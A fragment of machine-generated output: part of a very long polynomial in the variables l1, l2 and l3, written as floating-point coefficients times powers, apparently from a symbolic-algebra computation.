4.68224185501655e+29*l1**4*l2**5*l3**15 - 2.60192126316512e+29*l1**4*l2**5*l3**14 - 2.15590324828663e+27*l1**4*l2**5*l3**13 + 1.54090324649623e+27*l1**4*l2**5*l3**12 + 9.74031169866823e+24*l1**4*l2**5*l3**11 - 4.33068663030346e+24*l1**4*l2**5*l3**10 - 1.48069267269814e+23*l1**4*l2**5*l3**9 - 7.84765482285139e+21*l1**4*l2**5*l3**8 + 1.20638597643989e+21*l1**4*l2**5*l3**7 + 1.90804971468911e+20*l1**4*l2**5*l3**6 - 4.70640443697911e+18*l1**4*l2**5*l3**5 - 8.70554256436114e+17*l1**4*l2**5*l3**4 + 7.87666188979119e+15*l1**4*l2**5*l3**3 + 1.29726051546003e+15*l1**4*l2**5*l3**2 - 3113350969040.9*l1**4*l2**5*l3 - 329648926133.784*l1**4*l2**5 - 7.27228532483993e+32*l1**4*l2**4*l3**20 + 7.90584091433694e+32*l1**4*l2**4*l3**19 + 1.69250345896724e+31*l1**4*l2**4*l3**18 - 9.59526295097703e+30*l1**4*l2**4*l3**17 - 7.59552407608082e+28*l1**4*l2**4*l3**16 + 7.4046845625413e+27*l1**4*l2**4*l3**15 - 1.62271447723635e+27*l1**4*l2**4*l3**14 + 2.87015047734734e+25*l1**4*l2**4*l3**13 + 2.87552218397412e+25*l1**4*l2**4*l3**12 + 1.49264549046201e+24*l1**4*l2**4*l3**11 - 2.20006000570129e+23*l1**4*l2**4*l3**10 - 3.60245283971773e+22*l1**4*l2**4*l3**9 + 1.16476063076482e+21*l1**4*l2**4*l3**8 + 2.41543555537461e+20*l1**4*l2**4*l3**7 - 4.18746231274088e+18*l1**4*l2**4*l3**6 - 7.71710031251537e+17*l1**4*l2**4*l3**5 + 7.67598231192972e+15*l1**4*l2**4*l3**4 + 1.07139904370997e+15*l1**4*l2**4*l3**3 - 4349534442042.42*l1**4*l2**4*l3**2 - 309045868250.383*l1**4*l2**4*l3 - 115029479.497574*l1**4*l2**4 + 1.86290885430541e+32*l1**4*l2**3*l3**21 - 1.75432708784954e+32*l1**4*l2**3*l3**20 - 4.63768566284682e+30*l1**4*l2**3*l3**19 - 6.23403223688128e+29*l1**4*l2**3*l3**18 - 5.14187408243305e+27*l1**4*l2**3*l3**17 + 8.14296719676398e+28*l1**4*l2**3*l3**16 + 1.32609412602932e+27*l1**4*l2**3*l3**15 - 9.24280530952415e+26*l1**4*l2**3*l3**14 - 1.55304715878082e+25*l1**4*l2**3*l3**13 + 6.49884182400969e+24*l1**4*l2**3*l3**12 + 4.80422271726793e+22*l1**4*l2**3*l3**11 - 2.76956043071086e+22*l1**4*l2**3*l3**10 + 
2.87146983757024e+20*l1**4*l2**3*l3**9 + 1.30573118757167e+20*l1**4*l2**3*l3**8 - 2.56900371926981e+18*l1**4*l2**3*l3**7 - 5.49221046413404e+17*l1**4*l2**3*l3**6 + 6.85662149120904e+15*l1**4*l2**3*l3**5 + 1.04376924675805e+15*l1**4*l2**3*l3**4 - 5188918281734.68*l1**4*l2**3*l3**3 - 515076447084.019*l1**4*l2**3*l3**2 - 828212252.382887*l1**4*l2**3*l3 - 262267213.254582*l1**4*l2**3 - 5.700536429121e+31*l1**4*l2**2*l3**22 + 9.19516263108705e+30*l1**4*l2**2*l3**21 + 1.70743942096512e+30*l1**4*l2**2*l3**20 + 1.93241045486629e+30*l1**4*l2**2*l3**19 + 4.70203676588562e+27*l1**4*l2**2*l3**18 - 6.31474616704207e+28*l1**4*l2**2*l3**17 - 1.01828569050592e+27*l1**4*l2**2*l3**16 + 7.00165672596485e+26*l1**4*l2**2*l3**15 + 1.76243156697157e+25*l1**4*l2**2*l3**14 - 4.25581619033467e+24*l1**4*l2**2*l3**13 - 1.59617714975098e+23*l1**4*l2**2*l3**12 + 4.94082854134244e+21*l1**4*l2**2*l3**11 + 8.67023382140761e+20*l1**4*l2**2*l3**10 + 7.22898316268722e+19*l1**4*l2**2*l3**9 - 2.88443542329228e+18*l1**4*l2**2*l3**8 - 3.93609455481425e+17*l1**4*l2**2*l3**7 + 5.51665712792036e+15*l1**4*l2**2*l3**6 + 843768295488435.0*l1**4*l2**2*l3**5 - 4349534442042.35*l1**4*l2**2*l3**4 - 515076447083.938*l1**4*l2**2*l3**3 - 276070750.794211*l1**4*l2**2*l3**2 - 41410612.619124*l1**4*l2**2*l3 - 727920.924946217*l1**4*l2**2 + 1.57442425594868e+31*l1**4*l2*l3**23 + 6.6942056012387e+30*l1**4*l2*l3**22 - 6.84172477726512e+29*l1**4*l2*l3**21 - 8.63682028420122e+29*l1**4*l2*l3**20 + 6.80370136574655e+27*l1**4*l2*l3**19 + 2.62438654217679e+28*l1**4*l2*l3**18 + 1.86915218928019e+26*l1**4*l2*l3**17 - 3.49399325005896e+26*l1**4*l2*l3**16 - 4.02115233734136e+24*l1**4*l2*l3**15 + 3.0205065789026e+24*l1**4*l2*l3**14 + 3.26129310374009e+22*l1**4*l2*l3**13 - 1.60918614513978e+22*l1**4*l2*l3**12 - 8.16723968732136e+19*l1**4*l2*l3**11 + 6.40933702238751e+19*l1**4*l2*l3**10 - 3.25955456357595e+17*l1**4*l2*l3**9 - 2.04304951920708e+17*l1**4*l2*l3**8 + 2.2765613901237e+15*l1**4*l2*l3**7 + 384265382846644.0*l1**4*l2*l3**6 - 
3113350969040.75*l1**4*l2*l3**5 - 309045868250.389*l1**4*l2*l3**4 - 184047167.196166*l1**4*l2*l3**3 - 165642450.476648*l1**4*l2*l3**2 + 2911683.69978427*l1**4*l2*l3 + 1310257.664903*l1**4*l2 - 2.87222635984225e+30*l1**4*l3**24 - 1.59915871844996e+30*l1**4*l3**23 + 1.39928211794363e+29*l1**4*l3**22 + 1.55939137566313e+29*l1**4*l3**21 - 1.72556319383117e+27*l1**4*l3**20 - 4.92007391289801e+27*l1**4*l3**19 - 7.2713862268596e+25*l1**4*l3**18 + 6.72951782701245e+25*l1**4*l3**17 + 2.11543225756537e+24*l1**4*l3**16 - 5.4061993561907e+23*l1**4*l3**15 - 2.9115276356606e+22*l1**4*l3**14 + 1.44270342591004e+21*l1**4*l3**13 + 2.19484649898803e+20*l1**4*l3**12 + 7.37926688947019e+18*l1**4*l3**11 - 9.18299364761643e+17*l1**4*l3**10 - 6.96874585574734e+16*l1**4*l3**9 + 2.11731496642168e+15*l1**4*l3**8 + 271679153838375.0*l1**4*l3**7 - 1907690544755.41*l1**4*l3**6 - 329648926133.721*l1**4*l3**5 - 207053063.095703*l1**4*l3**4 - 13803537.5397175*l1**4*l3**3 + 1455841.84989212*l1**4*l3**2 + 327564.41622574*l1**4*l3 + 4776.98106995886*l1**4 - 2.35229786236642e+30*l1**3*l2**25 + 5.39110325538057e+30*l1**3*l2**24*l3 - 1.20391210337852e+30*l1**3*l2**24 + 4.28057636756803e+31*l1**3*l2**23*l3**2 + 3.91612163438601e+30*l1**3*l2**23*l3 + 2.93382519393052e+29*l1**3*l2**23 - 2.96197712377545e+32*l1**3*l2**22*l3**3 + 2.05301086610093e+31*l1**3*l2**22*l3**2 - 1.07416205473493e+30*l1**3*l2**22*l3 + 1.42828501676262e+29*l1**3*l2**22 + 9.84704191423313e+32*l1**3*l2**21*l3**4 - 2.01094208845081e+32*l1**3*l2**21*l3**3 + 1.2646833380359e+30*l1**3*l2**21*l3**2 - 6.737872703529e+29*l1**3*l2**21*l3 - 1.11786350370885e+28*l1**3*l2**21 - 2.02504577992603e+33*l1**3*l2**20*l3**5 + 8.65444708941133e+32*l1**3*l2**20*l3**4 + 3.32083739888826e+30*l1**3*l2**20*l3**3 + 1.21493209296624e+30*l1**3*l2**20*l3**2 + 3.74105873163483e+28*l1**3*l2**20*l3 - 5.32041695002341e+27*l1**3*l2**20 + 2.56998132377561e+33*l1**3*l2**19*l3**6 - 2.50118418307563e+33*l1**3*l2**19*l3**5 - 1.66328406529202e+31*l1**3*l2**19*l3**4 + 
1.36965219917627e+30*l1**3*l2**19*l3**3 - 6.84730212187247e+28*l1**3*l2**19*l3**2 + 2.35368530358584e+28*l1**3*l2**19*l3 + 1.87327278404516e+26*l1**3*l2**19 - 7.05739837204822e+32*l1**3*l2**18*l3**7 + 5.49316017158553e+33*l1**3*l2**18*l3**6 + 3.22043740491244e+31*l1**3*l2**18*l3**5 - 1.44978681423231e+31*l1**3*l2**18*l3**4 + 2.74773678224994e+28*l1**3*l2**18*l3**3 - 5.55258529654996e+28*l1**3*l2**18*l3**2 - 4.50466255747828e+26*l1**3*l2**18*l3 + 9.1566203496743e+25*l1**3*l2**18 - 5.59838814684021e+33*l1**3*l2**17*l3**8 - 9.60934473916576e+33*l1**3*l2**17*l3**7 - 2.39452121843543e+31*l1**3*l2**17*l3**6 + 4.7235361542522e+31*l1**3*l2**17*l3**5 + 9.84650579547746e+28*l1**3*l2**17*l3**4 + 5.40462141240705e+28*l1**3*l2**17*l3**3 + 7.43722127565787e+26*l1**3*l2**17*l3**2 - 3.28435548380857e+26*l1**3*l2**17*l3 - 2.21636873890082e+24*l1**3*l2**17 + 1.72393751956456e+34*l1**3*l2**16*l3**9 + 1.37396718666623e+34*l1**3*l2**16*l3**8 - 4.85410605484956e+31*l1**3*l2**16*l3**7 - 1.02063052442476e+32*l1**3*l2**16*l3**6 - 1.89281962141299e+29*l1**3*l2**16*l3**5 + 6.83758818874324e+28*l1**3*l2**16*l3**4 - 7.17732309296775e+24*l1**3*l2**16*l3**3 + 7.29122213814519e+26*l1**3*l2**16*l3**2 + 3.2988066902924e+24*l1**3*l2**16*l3 - 1.07824779006632e+24*l1**3*l2**16 - 3.24909072621069e+34*l1**3*l2**15*l3**10 - 1.61098249822449e+34*l1**3*l2**15*l3**9 + 2.11040084159398e+32*l1**3*l2**15*l3**8 + 1.65973695258204e+32*l1**3*l2**15*l3**7 - 1.49834873655294e+29*l1**3*l2**15*l3**6 - 3.97350630187604e+29*l1**3*l2**15*l3**5 - 8.51927744121232e+26*l1**3*l2**15*l3**4 - 7.05162387204853e+26*l1**3*l2**15*l3**3 - 5.85428240359493e+24*l1**3*l2**15*l3**2 + 2.92989341659408e+24*l1**3*l2**15*l3 + 1.71430784110893e+22*l1**3*l2**15 + 4.76332947268942e+34*l1**3*l2**14*l3**11 + 1.52362345585817e+34*l1**3*l2**14*l3**10 - 4.4908282441844e+32*l1**3*l2**14*l3**9 - 2.11705374516323e+32*l1**3*l2**14*l3**8 + 1.2493417939631e+30*l1**3*l2**14*l3**7 + 8.83194470906869e+29*l1**3*l2**14*l3**6 + 
9.73036842024547e+26*l1**3*l2**14*l3**5 - 2.15863403365341e+26*l1**3*l2**14*l3**4 - 2.74435720944937e+24*l1**3*l2**14*l3**3 - 6.28855895160195e+24*l1**3*l2**14*l3**2 - 7.55960220591976e+21*l1**3*l2**14*l3 + 8.04602252132235e+21*l1**3*l2**14 - 5.81093794531802e+34*l1**3*l2**13*l3**12 - 1.07880700927287e+34*l1**3*l2**13*l3**11 + 6.99047154902026e+32*l1**3*l2**13*l3**10 + 2.10927312839132e+32*l1**3*l2**13*l3**9 - 3.15970301701345e+30*l1**3*l2**13*l3**8 - 1.32617101756317e+30*l1**3*l2**13*l3**7 + 3.68934492204568e+27*l1**3*l2**13*l3**6 + 2.46709015784568e+27*l1**3*l2**13*l3**5 + 2.62322580037733e+24*l1**3*l2**13*l3**4 + 5.45038283940835e+24*l1**3*l2**13*l3**3 + 3.05897800900814e+22*l1**3*l2**13*l3**2 - 1.3340103985638e+22*l1**3*l2**13*l3 - 1.09545374380453e+20*l1**3*l2**13 + 6.09654325032564e+34*l1**3*l2**12*l3**13 + 4.03166085179397e+33*l1**3*l2**12*l3**12 - 8.80948358268668e+32*l1**3*l2**12*l3**11 - 1.54054184579694e+32*l1**3*l2**12*l3**10 + 5.33509552427085e+30*l1**3*l2**12*l3**9 + 1.4446599031344e+30*l1**3*l2**12*l3**8 - 1.25934972804053e+28*l1**3*l2**12*l3**7 - 4.82935378907292e+27*l1**3*l2**12*l3**6 - 3.3803396555491e+24*l1**3*l2**12*l3**5 - 1.95026338274561e+24*l1**3*l2**12*l3**4 + 4.33093030322589e+22*l1**3*l2**12*l3**3 + 2.98034637392858e+22*l1**3*l2**12*l3**2 - 2.87167398368944e+19*l1**3*l2**12*l3 - 4.51333277413767e+19*l1**3*l2**12 - 5.55614168488802e+34*l1**3*l2**11*l3**14 + 2.82632222614957e+33*l1**3*l2**11*l3**13 + 9.32317377128515e+32*l1**3*l2**11*l3**12 + 5.81819023321528e+31*l1**3*l2**11*l3**11 - 7.01540840958642e+30*l1**3*l2**11*l3**10 - 1.1075189414296e+30*l1**3*l2**11*l3**9 + 2.523285101305e+28*l1**3*l2**11*l3**8 + 6.10566394438735e+27*l1**3*l2**11*l3**7 - 3.25370107116981e+25*l1**3*l2**11*l3**6 - 8.03887301682633e+24*l1**3*l2**11*l3**5 + 2.0794898912507e+22*l1**3*l2**11*l3**4 - 1.25855456824e+22*l1**3*l2**11*l3**3 - 2.17433812395411e+20*l1**3*l2**11*l3**2 + 3.15115703392472e+19*l1**3*l2**11*l3 + 5.65217569134113e+17*l1**3*l2**11 + 
4.41037979806507e+34*l1**3*l2**10*l3**15 - 7.63903127690556e+33*l1**3*l2**10*l3**14 - 8.42965060737092e+32*l1**3*l2**10*l3**13 + 4.00356763619207e+31*l1**3*l2**10*l3**12 + 7.50876663259341e+30*l1**3*l2**10*l3**11 + 4.20203851819899e+29*l1**3*l2**10*l3**10 - 3.46128182675897e+28*l1**3*l2**10*l3**9 - 4.79723102749473e+27*l1**3*l2**10*l3**8 + 6.53491633581114e+25*l1**3*l2**10*l3**7 + 1.19898018230149e+25*l1**3*l2**10*l3**6 + 2.46745906233706e+22*l1**3*l2**10*l3**5 + 1.25920642168935e+22*l1**3*l2**10*l3**4 - 2.7341069749995e+20*l1**3*l2**10*l3**3 - 1.12162958016938e+20*l1**3*l2**10*l3**2 + 2.88107056311658e+17*l1**3*l2**10*l3 + 1.99386477032854e+17*l1**3*l2**10 - 3.01716829095993e+34*l1**3*l2**9*l3**16 + 9.39505747089347e+33*l1**3*l2**9*l3**15 + 6.5047353153421e+32*l1**3*l2**9*l3**14 - 1.06072160318306e+32*l1**3*l2**9*l3**13 - 6.70376547971511e+30*l1**3*l2**9*l3**12 + 2.98030880130107e+29*l1**3*l2**9*l3**11 + 3.84068051744089e+28*l1**3*l2**9*l3**10 + 1.79702790117975e+27*l1**3*l2**9*l3**9 - 1.14358120473622e+26*l1**3*l2**9*l3**8 - 1.27025937988743e+25*l1**3*l2**9*l3**7 + 1.82372187091844e+23*l1**3*l2**9*l3**6 + 2.47791308158912e+22*l1**3*l2**9*l3**5 - 3.56405884370719e+20*l1**3*l2**9*l3**4 - 1.53519418755438e+19*l1**3*l2**9*l3**3 + 1.16416565928422e+18*l1**3*l2**9*l3**2 - 5.35371510453252e+16*l1**3*l2**9*l3 - 1.35531681521058e+15*l1**3*l2**9 + 1.75374406123345e+34*l1**3*l2**8*l3**17 - 8.41927081037929e+33*l1**3*l2**8*l3**16 - 4.24843519015794e+32*l1**3*l2**8*l3**15 + 1.24311796841942e+32*l1**3*l2**8*l3**14 + 4.96627534353902e+30*l1**3*l2**8*l3**13 - 7.51715791978048e+29*l1**3*l2**8*l3**12 - 3.32887861431997e+28*l1**3*l2**8*l3**11 + 1.66608065291528e+27*l1**3*l2**8*l3**10 + 1.1778599893536e+26*l1**3*l2**8*l3**9 + 2.11129511274549e+24*l1**3*l2**8*l3**8 - 1.64913047270065e+23*l1**3*l2**8*l3**7 - 1.8672410303454e+21*l1**3*l2**8*l3**6 - 2.59535005862358e+20*l1**3*l2**8*l3**5 - 8.84986252008944e+19*l1**3*l2**8*l3**4 + 1.29776639633346e+18*l1**3*l2**8*l3**3 + 
4.1741869244001e+17*l1**3*l2**8*l3**2 - 1.23313838142271e+15*l1**3*l2**8*l3 - 397592085662180.0*l1**3*l2**8 - 8.41468433433262e+33*l1**3*l2**7*l3**18 + 5.98395197701982e+33*l1**3*l2**7*l3**17 + 2.29690838737248e+32*l1**3*l2**7*l3**16 - 1.03518066070526e+32*l1**3*l2**7*l3**15 - 3.02333795925141e+30*l1**3*l2**7*l3**14 + 8.16965609835905e+29*l1**3*l2**7*l3**13 + 2.37634240889615e+28*l1**3*l2**7*l3**12 - 3.46764333350313e+27*l1**3*l2**7*l3**11 - 1.09507372279127e+26*l1**3*l2**7*l3**10 + 5.24273600377718e+24*l1**3*l2**7*l3**9 + 3.20284098725682e+23*l1**3*l2**7*l3**8 + 9.50310988489049e+21*l1**3*l2**7*l3**7 - 7.16781944826816e+20*l1**3*l2**7*l3**6 - 7.42994652382531e+19*l1**3*l2**7*l3**5 + 1.66863084178526e+18*l1**3*l2**7*l3**4 + 1.26926296239692e+17*l1**3*l2**7*l3**3 - 2.60204824628014e+15*l1**3*l2**7*l3**2 - 48805716520599.4*l1**3*l2**7*l3 + 1068306705063.04*l1**3*l2**7 + 3.22063902734493e+33*l1**3*l2**6*l3**19 - 3.42504815895013e+33*l1**3*l2**6*l3**18 - 9.99923909393012e+31*l1**3*l2**6*l3**17 + 6.57668425865156e+31*l1**3*l2**6*l3**16 + 1.45556473765184e+30*l1**3*l2**6*l3**15 - 6.03444865303512e+29*l1**3*l2**6*l3**14 - 1.26518979382241e+28*l1**3*l2**6*l3**13 + 3.46201051719853e+27*l1**3*l2**6*l3**12 + 6.26438223396147e+25*l1**3*l2**6*l3**11 - 1.14016788057713e+25*l1**3*l2**6*l3**10 - 1.59662276944283e+23*l1**3*l2**6*l3**9 + 3.18040065251121e+22*l1**3*l2**6*l3**8 - 6.39147010599892e+19*l1**3*l2**6*l3**7 - 1.08062935392855e+20*l1**3*l2**6*l3**6 + 1.59894925588116e+18*l1**3*l2**6*l3**5 + 3.93370176772023e+17*l1**3*l2**6*l3**4 - 3.35743196823859e+15*l1**3*l2**6*l3**3 - 669111969994329.0*l1**3*l2**6*l3**2 + 1480367862730.22*l1**3*l2**6*l3 + 199162892872.477*l1**3*l2**6 - 9.19627315797504e+32*l1**3*l2**5*l3**20 + 1.56437701632366e+33*l1**3*l2**5*l3**19 + 3.35840413140823e+31*l1**3*l2**5*l3**18 - 3.17832208711817e+31*l1**3*l2**5*l3**17 - 5.33408442520211e+29*l1**3*l2**5*l3**16 + 3.10762513139142e+29*l1**3*l2**5*l3**15 + 5.05155952837658e+27*l1**3*l2**5*l3**14 - 
2.07197508378278e+27*l1**3*l2**5*l3**13 - 3.02387413645229e+25*l1**3*l2**5*l3**12 + 7.79389266871292e+24*l1**3*l2**5*l3**11 + 1.43215190121957e+23*l1**3*l2**5*l3**10 - 1.77148244288076e+22*l1**3*l2**5*l3**9 - 5.68928661653345e+20*l1**3*l2**5*l3**8 - 1.64060390740703e+19*l1**3*l2**5*l3**7 + 1.78798613879653e+18*l1**3*l2**5*l3**6 + 2.24399193022457e+17*l1**3*l2**5*l3**5 - 3.49294184958564e+15*l1**3*l2**5*l3**4 - 391456747291380.0*l1**3*l2**5*l3**3 + 2197659507558.21*l1**3*l2**5*l3**2 + 123618347300.067*l1**3*l2**5*l3 + 276070750.79416*l1**3*l2**5 + 1.83125883800276e+32*l1**3*l2**4*l3**21 - 5.49211072367655e+32*l1**3*l2**4*l3**20 - 8.55512232258787e+30*l1**3*l2**4*l3**19 + 1.09609531199898e+31*l1**3*l2**4*l3**18 + 1.35947066607854e+29*l1**3*l2**4*l3**17 - 9.8964456496617e+28*l1**3*l2**4*l3**16 - 9.25889017122187e+26*l1**3*l2**4*l3**15 + 7.31790671415714e+26*l1**3*l2**4*l3**14 + 8.62009817485307e+23*l1**3*l2**4*l3**13 - 3.74500377545104e+24*l1**3*l2**4*l3**12 + 2.90057159538694e+22*l1**3*l2**4*l3**11 + 2.32672235732747e+22*l1**3*l2**4*l3**10 - 2.83465100419495e+20*l1**3*l2**4*l3**9 - 1.10518003347436e+20*l1**3*l2**4*l3**8 + 1.42758267637722e+18*l1**3*l2**4*l3**7 + 3.27474026648966e+17*l1**3*l2**4*l3**6 - 3.42394814608585e+15*l1**3*l2**4*l3**5 - 582078109595745.0*l1**3*l2**4*l3**4 + 2823382006238.04*l1**3*l2**4*l3**3 + 309045868250.513*l1**3*l2**4*l3**2 + 920235835.981084*l1**3*l2**4*l3 + 276070750.794325*l1**3*l2**4 - 2.53402044400845e+31*l1**3*l2**3*l3**22 + 1.38027386886211e+32*l1**3*l2**3*l3**21 + 1.91311949910085e+30*l1**3*l2**3*l3**20 - 2.17632629395825e+30*l1**3*l2**3*l3**19 - 2.75397347634723e+28*l1**3*l2**3*l3**18 + 4.12583165387692e+27*l1**3*l2**3*l3**17 - 7.86635150560386e+25*l1**3*l2**3*l3**16 + 5.1330629209787e+25*l1**3*l2**3*l3**15 + 3.78749632286755e+24*l1**3*l2**3*l3**14 - 8.47334784171875e+23*l1**3*l2**3*l3**13 - 2.47880253383781e+22*l1**3*l2**3*l3**12 + 1.61032026684862e+21*l1**3*l2**3*l3**11 - 7.41500975270794e+18*l1**3*l2**3*l3**10 - 
8.91338462654765e+18*l1**3*l2**3*l3**9 + 6.76304340381717e+17*l1**3*l2**3*l3**8 + 1.26712582722536e+17*l1**3*l2**3*l3**7 - 2.69884101867087e+15*l1**3*l2**3*l3**6 - 369352909729861.0*l1**3*l2**3*l3**5 + 2823382006238.08*l1**3*l2**3*l3**4 + 274707438444.747*l1**3*l2**3*l3**3 - 368094334.392738*l1**3*l2**3*l3**2 - 55214150.1588828*l1**3*l2**3*l3 - 970561.233261321*l1**3*l2**3 + 7.27899896466175e+30*l1**3*l2**2*l3**23 - 2.0493764144681e+31*l1**3*l2**2*l3**22 - 6.1758748382666e+29*l1**3*l2**2*l3**21 - 6.00331468795204e+28*l1**3*l2**2*l3**20 + 8.04097867899831e+27*l1**3*l2**2*l3**19 + 1.3345130651114e+28*l1**3*l2**2*l3**18 + 1.81060425471692e+26*l1**3*l2**2*l3**17 - 1.84665911125957e+26*l1**3*l2**2*l3**16 - 4.83619712208962e+24*l1**3*l2**2*l3**15 + 1.39751922241817e+24*l1**3*l2**2*l3**14 + 5.37824192171807e+22*l1**3*l2**2*l3**13 - 2.04952291382631e+21*l1**3*l2**2*l3**12 - 3.29163146762741e+20*l1**3*l2**2*l3**11 - 2.6241917262785e+19*l1**3*l2**2*l3**10 + 1.16711985927656e+18*l1**3*l2**2*l3**9 + 1.49287509219763e+17*l1**3*l2**2*l3**8 - 2.35557291474068e+15*l1**3*l2**2*l3**7 - 377835742127364.0*l1**3*l2**2*l3**6 + 2197659507558.39*l1**3*l2**2*l3**5 + 309045868250.383*l1**3*l2**2*l3**4 + 1104283003.1771*l1**3*l2**2*l3**3 + 165642450.476623*l1**3*l2**2*l3**2 - 9462972.02429922*l1**3*l2**2*l3 - 2292950.91358024*l1**3*l2**2 - 3.05899679097435e+30*l1**3*l2*l3**24 + 6.17856777582917e+29*l1**3*l2*l3**23 + 2.32123647545477e+29*l1**3*l2*l3**22 + 1.70228305116168e+29*l1**3*l2*l3**21 - 4.4747631057737e+27*l1**3*l2*l3**20 - 6.92977489417366e+27*l1**3*l2*l3**19 - 2.31593525206083e+25*l1**3*l2*l3**18 + 1.03937007192677e+26*l1**3*l2*l3**17 + 1.19656092569525e+24*l1**3*l2*l3**16 - 9.91804317363117e+23*l1**3*l2*l3**15 - 1.4493252945256e+22*l1**3*l2*l3**14 + 5.26665320255722e+21*l1**3*l2*l3**13 + 7.17871998641578e+19*l1**3*l2*l3**12 - 1.85354223972665e+19*l1**3*l2*l3**11 - 6.46236567757316e+16*l1**3*l2*l3**10 + 5.76271988048126e+16*l1**3*l2*l3**9 - 642410091035230.0*l1**3*l2*l3**8 - 
111627149590258.0*l1**3*l2*l3**7 + 1480367862730.1*l1**3*l2*l3**6 + 123618347300.159*l1**3*l2*l3**5 - 184047167.19623*l1**3*l2*l3**4 + 110428300.317747*l1**3*l2*l3**3 + 1455841.84989224*l1**3*l2*l3**2 - 655128.832451519*l1**3*l2*l3 - 9553.96213991778*l1**3*l2 + 6.46124734727255e+29*l1**3*l3**25 + 2.40782420675704e+29*l1**3*l3**24 - 4.48886072195926e+28*l1**3*l3**23 - 3.60902206991554e+28*l1**3*l3**22 + 9.64144733159695e+26*l1**3*l3**21 + 1.33050352728829e+27*l1**3*l3**20 + 9.25384491292991e+24*l1**3*l3**19 - 2.07287622373986e+25*l1**3*l3**18 - 4.90823819471978e+23*l1**3*l3**17 + 1.97142753739963e+23*l1**3*l3**16 + 8.37989478331208e+21*l1**3*l3**15 - 7.88390493299815e+20*l1**3*l3**14 - 7.35251318028837e+19*l1**3*l3**13 - 9.15137096717835e+17*l1**3*l3**12 + 3.53203291464153e+17*l1**3*l3**11 + 2.2112263542508e+16*l1**3*l3**10 - 959936036606019.0*l1**3*l3**9 - 121886183220403.0*l1**3*l3**8 + 1068306705063.06*l1**3*l3**7 + 199162892872.468*l1**3*l3**6 + 184047167.196185*l1**3*l3**5 - 13803537.5397318*l1**3*l3**4 - 3154324.00809967*l1**3*l3**3 - 327564.416225737*l1**3*l3**2 + 19107.9242798354*l1**3*l3 + 4299.28296296297*l1**3 + 2.17057528072439e+29*l1**2*l2**26 + 2.14028818378402e+30*l1**2*l2**25*l3 + 1.09033548985225e+29*l1**2*l2**25 - 3.18872652286879e+31*l1**2*l2**24*l3**2 + 8.85897585504934e+29*l1**2*l2**24*l3 - 4.7987210755966e+28*l1**2*l2**24 + 1.75614683759071e+32*l1**2*l2**23*l3**3 - 1.65049534776382e+31*l1**2*l2**23*l3**2 + 1.24954345151011e+29*l1**2*l2**23*l3 - 2.19886732219522e+28*l1**2*l2**23 - 6.10956367330029e+32*l1**2*l2**22*l3**4 + 1.06007868000884e+32*l1**2*l2**22*l3**3 + 4.31781376452818e+29*l1**2*l2**22*l3**2 + 7.72539790761153e+28*l1**2*l2**22*l3 + 2.14213330724483e+27*l1**2*l2**22 + 1.52108867823674e+33*l1**2*l2**21*l3**5 - 4.32222617371051e+32*l1**2*l2**21*l3**4 - 4.07355313048527e+30*l1**2*l2**21*l3**3 + 1.60887135692081e+29*l1**2*l2**21*l3**2 - 7.22229721814163e+27*l1**2*l2**21*l3 + 9.55309564496876e+26*l1**2*l2**21 - 
2.87121174209474e+33*l1**2*l2**20*l3**6 + 1.29606816759373e+33*l1**2*l2**20*l3**5 + 1.49936224811968e+31*l1**2*l2**20*l3**4 - 2.34114204281082e+30*l1**2*l2**20*l3**3 + 6.05073980141746e+27*l1**2*l2**20*l3**2 - 4.10025000436417e+27*l1**2*l2**20*l3 - 3.92258424611838e+25*l1**2*l2**20 + 4.17857952077197e+33*l1**2*l2**19*l3**7 - 3.06963513377463e+33*l1**2*l2**19*l3**6 - 3.57568241134725e+31*l1**2*l2**19*l3**5 + 1.06784710646719e+31*l1**2*l2**19*l3**4 + 4.07952458533955e+28*l1**2*l2**19*l3**3 + 5.69722048985416e+27*l1**2*l2**19*l3**2 + 1.02964702119502e+26*l1**2*l2**19*l3 - 1.79355467835938e+25*l1**2*l2**19 - 4.67809451491002e+33*l1**2*l2**18*l3**8 + 5.97765528956592e+33*l1**2*l2**18*l3**7 + 6.17061236010349e+31*l1**2*l2**18*l3**6 - 3.18794691603593e+31*l1**2*l2**18*l3**5 - 1.81979682787575e+29*l1**2*l2**18*l3**4 + 1.94434565297567e+28*l1**2*l2**18*l3**3 - 8.22093585200107e+25*l1**2*l2**18*l3**2 + 6.60767783980538e+25*l1**2*l2**18*l3 + 5.08300423135721e+23*l1**2*l2**18 + 3.92882202370295e+33*l1**2*l2**17*l3**9 - 9.84622012433616e+33*l1**2*l2**17*l3**8 - 7.98194871714456e+31*l1**2*l2**17*l3**7 + 7.2020726709817e+31*l1**2*l2**17*l3**6 + 4.25340869959796e+29*l1**2*l2**17*l3**5 - 1.28030214976958e+29*l1**2*l2**17*l3**4 - 4.77216383137274e+26*l1**2*l2**17*l3**3 - 1.02037683011198e+26*l1**2*l2**17*l3**2 - 9.59450157065821e+23*l1**2*l2**17*l3 + 2.31127686401205e+23*l1**2*l2**17 - 2.50512655352736e+33*l1**2*l2**16*l3**10 + 1.4018525168192e+34*l1**2*l2**16*l3**9 + 7.85141654760245e+31*l1**2*l2**16*l3**8 - 1.3116617096278e+32*l1**2*l2**16*l3**7 - 6.72405704049661e+29*l1**2*l2**16*l3**6 + 3.94277201789199e+29*l1**2*l2**16*l3**5 + 1.78203815940137e+27*l1**2*l2**16*l3**4 - 1.50908676751066e+26*l1**2*l2**16*l3**3 + 8.92358637549181e+23*l1**2*l2**16*l3**2 - 6.94427298621509e+23*l1**2*l2**16*l3 - 4.21735532270256e+21*l1**2*l2**16 + 1.84031467998792e+33*l1**2*l2**15*l3**11 - 1.75966927744337e+34*l1**2*l2**15*l3**10 - 6.17109843040404e+31*l1**2*l2**15*l3**9 + 
2.00092206203733e+32*l1**2*l2**15*l3**8 + 7.89017930019053e+29*l1**2*l2**15*l3**7 - 8.52730556344063e+29*l1**2*l2**15*l3**6 - 3.6813568004011e+27*l1**2*l2**15*l3**5 + 1.13250649740791e+27*l1**2*l2**15*l3**4 + 3.67409914573475e+24*l1**2*l2**15*l3**3 + 1.16057826408094e+24*l1**2*l2**15*l3**2 + 3.67119616170204e+21*l1**2*l2**15*l3 - 1.85658806524068e+21*l1**2*l2**15 - 3.18640955995286e+33*l1**2*l2**14*l3**12 + 1.98401534491601e+34*l1**2*l2**14*l3**11 + 5.2012289003294e+31*l1**2*l2**14*l3**10 - 2.62918552167448e+32*l1**2*l2**14*l3**9 - 7.40605251945655e+29*l1**2*l2**14*l3**8 + 1.44876784749148e+30*l1**2*l2**14*l3**7 + 5.08576085754101e+27*l1**2*l2**14*l3**6 - 3.26800145020451e+27*l1**2*l2**14*l3**5 - 